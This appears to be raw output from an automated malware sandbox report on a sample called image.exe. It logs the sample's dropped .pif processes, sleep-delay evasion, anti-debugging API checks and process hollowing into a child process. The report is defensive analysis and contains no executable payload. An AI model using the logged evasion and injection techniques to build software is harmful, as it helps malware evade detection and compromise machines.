Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -594235s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -594110s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -593985s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -593860s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02C958B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02C958B4

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598393	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598037	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596580	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596231	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595827	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595170	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599563
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599375
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599136
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599016
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598766
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598656
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598547
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598438
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598313
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598188
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597969
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597735
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597610
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597485
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597235
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597110
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596985
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596860
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596735
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596610
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596485
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596235
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596110
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595985
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595860
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595735
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595614
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595485
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595235
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595110
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594985
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594860
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594735
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594610
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594485
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594235
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594110
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 593985
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 593860

Source: Pumyophn.PIF, 00000004.00000002.1829239172.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: Pumyophn.PIF, 00000009.00000002.1915195422.00000000006E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: nhpoymuP.pif, 0000000E.00000002.2962865197.00000000240D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldt
Source: image.exe, 00000000.00000002.1711881761.0000000000873000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: image.exe, 00000000.00000002.1711881761.000000000084B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHy
Source: nhpoymuP.pif, 00000007.00000002.2962828189.0000000025869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: nhpoymuP.pif, 00000003.00000003.1964748013.000000002D7DE000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1983111128.000000002D7DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: image.exe, 00000000.00000002.1711881761.0000000000873000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWD

Source: C:\Users\user\Desktop\image.exe	API call chain: ExitProcess graph end node	graph_0-25416
Source: C:\Users\Public\Libraries\nhpoymuP.pif	API call chain: ExitProcess graph end node	graph_3-23780
Source: C:\Users\Public\Libraries\Pumyophn.PIF	API call chain: ExitProcess graph end node	graph_4-27011
Source: C:\Users\Public\Libraries\nhpoymuP.pif	API call chain: ExitProcess graph end node	graph_7-86022
Source: C:\Users\Public\Libraries\Pumyophn.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\nhpoymuP.pif	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02CAEBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02CAEBE8

Source: C:\Users\user\Desktop\image.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Code function: 7_2_2B6FB2A0 LdrInitializeThunk,

7_2_2B6FB2A0

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0040CE09

Source: C:\Users\Public\Libraries\nhpoymuP.pif

3_2_004019F0

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02CA8798 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02CA8798

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Code function: 3_2_0040ADB0 GetProcessHeap,HeapFree,

3_2_0040ADB0

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040CE09
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040E61C
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00416F6A
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_2_004123F1 SetUnhandledExceptionFilter,	3_2_004123F1
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_004123F1 SetUnhandledExceptionFilter,	3_1_004123F1
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_1_0040CE09
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_1_0040E61C
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 3_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_1_00416F6A
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_1_0040CE09
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_1_0040E61C
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_1_00416F6A
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_004123F1 SetUnhandledExceptionFilter,	7_1_004123F1
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_0040CE09
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_0040E61C
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00416F6A
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_004123F1 SetUnhandledExceptionFilter,	14_2_004123F1
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_1_0040CE09
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_1_0040E61C
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_1_00416F6A
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_1_004123F1 SetUnhandledExceptionFilter,	14_1_004123F1

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\image.exe	Memory allocated: C:\Users\Public\Libraries\nhpoymuP.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: C:\Users\Public\Libraries\nhpoymuP.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: C:\Users\Public\Libraries\nhpoymuP.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\image.exe	Section unmapped: C:\Users\Public\Libraries\nhpoymuP.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section unmapped: C:\Users\Public\Libraries\nhpoymuP.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section unmapped: C:\Users\Public\Libraries\nhpoymuP.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\image.exe	Memory written: C:\Users\Public\Libraries\nhpoymuP.pif base: 277008	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory written: C:\Users\Public\Libraries\nhpoymuP.pif base: 313008	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory written: C:\Users\Public\Libraries\nhpoymuP.pif base: 274008

Source: C:\Users\user\Desktop\image.exe	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif

Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(U
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxb
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB8000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$K
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdW
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0b
Source: nhpoymuP.pif, 00000007.00000002.2976362655.000000002C0EE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: +Program Manager
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB8000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtX
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTv
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpP
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdB
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD"
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTa
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4A
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPY
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB8000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$+
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB8000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB8000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtm
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CB8000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4,
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHL
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt8
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`"
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026094000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(j
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026094000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxw
Source: nhpoymuP.pif, 0000000E.00000002.2976364838.000000002A83E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: o*Program Manager

Source: C:\Users\user\Desktop\image.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02C95A78
Source: C:\Users\user\Desktop\image.exe	Code function: GetLocaleInfoA,	0_2_02C9A790
Source: C:\Users\user\Desktop\image.exe	Code function: GetLocaleInfoA,	0_2_02C9A744
